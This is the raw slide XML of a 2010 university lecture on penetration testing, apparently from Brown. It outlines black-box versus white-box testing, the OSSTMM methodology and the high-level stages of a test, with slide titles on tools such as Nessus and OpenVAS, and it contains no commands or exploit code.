              <a:t>And, elevation procedures make not telling risky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60C45FB-1824-4F97-9564-5A245FC190A8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6F38C0-D7E7-4B53-B8CB-F0C4928283E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00063"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Black Box      vs.     White Box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981200"/>
            <a:ext cx="3929062" cy="3827463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>It treats the system as a "black-box", so it doesn't explicitly use knowledge of the internal structure.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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000625" y="2057400"/>
            <a:ext cx="3857625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90513" indent="-290513" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="200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tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>It allows one to peek inside the "box", and it focuses specifically on using internal knowledge of the software to guide the selection of test data</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" kern="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304631C-B9C9-4FDE-8216-4A9B827A4C66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13F957-3B34-42DF-9247-E1D50024B60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FB3CB-8187-4756-87F3-22CB2F93A3D1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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OSSTMM	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00063" y="1447800"/>
            <a:ext cx="8415337" cy="46482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mtClean="0"/>
              <a:t>OSSTMM – Open-Source Security Testing Methodology Manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Version 3.0 RC 26 at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.osstmm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> http://www.isecom.org/projects/osstmm.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>It defines how to go about performing a pen test, but does not go into the actual tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>.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7194305-9CEA-43D9-B26E-EEAF359D1520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Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1127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505200"/>
            <a:ext cx="26289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93025" y="0"/>
            <a:ext cx="14509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178257-7076-49B8-BE34-4D81D518D8B8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Technique – Penetration Testing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arenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gather Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Scan IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Identify vulnerable services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Exploit vulnerability (with care!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fix problems ?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784E8DB-512C-4B66-804B-4C56E8E3D6F4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4299B-5B63-40B1-B6D0-7E1F7247FE8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3315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Gathering Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316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Goal – Given a company’s name, determine information like: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>what IP address ranges they have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>WHOIS (arin.net …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Nslookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>personal information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>we.register.it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C2F9AC-B5E7-4487-B277-0BB95AA9EC56}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12/7/2010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Penetration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1937</TotalTime>
  <Pages>0</Pages>
  <Words>1300</Words>
  <Characters>0</Characters>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Lines>0</Lines>
  <Paragraphs>303</Paragraphs>
  <Slides>30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Worksheet</vt:lpstr>
      <vt:lpstr>Penetration Testing</vt:lpstr>
      <vt:lpstr>What Is a Penetration Testing?</vt:lpstr>
      <vt:lpstr>Penetration Testing Is Not…</vt:lpstr>
      <vt:lpstr>Authorization Letter</vt:lpstr>
      <vt:lpstr>To Tell or Not to Tell?</vt:lpstr>
      <vt:lpstr>Black Box      vs.     White Box</vt:lpstr>
      <vt:lpstr>OSSTMM </vt:lpstr>
      <vt:lpstr>Technique – Penetration Testing</vt:lpstr>
      <vt:lpstr>Gathering Information</vt:lpstr>
      <vt:lpstr>Scan IP Addresses</vt:lpstr>
      <vt:lpstr>Fingerprinting</vt:lpstr>
      <vt:lpstr>Identify Vulnerable Services</vt:lpstr>
      <vt:lpstr>Slide 13</vt:lpstr>
      <vt:lpstr>Slide 14</vt:lpstr>
      <vt:lpstr>Exploit vulnerability</vt:lpstr>
      <vt:lpstr>Slide 16</vt:lpstr>
      <vt:lpstr>Alternatives</vt:lpstr>
      <vt:lpstr>Penetration Test Tutorial</vt:lpstr>
      <vt:lpstr>Slide 19</vt:lpstr>
      <vt:lpstr>Identify active hosts and services  in the network</vt:lpstr>
      <vt:lpstr>Identify target OS version</vt:lpstr>
      <vt:lpstr>Vulnerability scanning</vt:lpstr>
      <vt:lpstr>Introduction to Nessus</vt:lpstr>
      <vt:lpstr>Nessus Features</vt:lpstr>
      <vt:lpstr>OpenVAS</vt:lpstr>
      <vt:lpstr>Open VAS technology</vt:lpstr>
      <vt:lpstr>Exploit vulnerabilities</vt:lpstr>
      <vt:lpstr>Select the exploit and the payload</vt:lpstr>
      <vt:lpstr>Set options for exploit and payload</vt:lpstr>
      <vt:lpstr>Vulnerabilities disclosure</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Brown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 Permissions</dc:title>
  <dc:creator>Roberto Tamassia</dc:creator>
  <cp:lastModifiedBy>goodrich</cp:lastModifiedBy>
  <cp:revision>70</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-15T18:48:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-12-08T00:25:04Z</dcterms:modified>
</cp:coreProperties>
</file>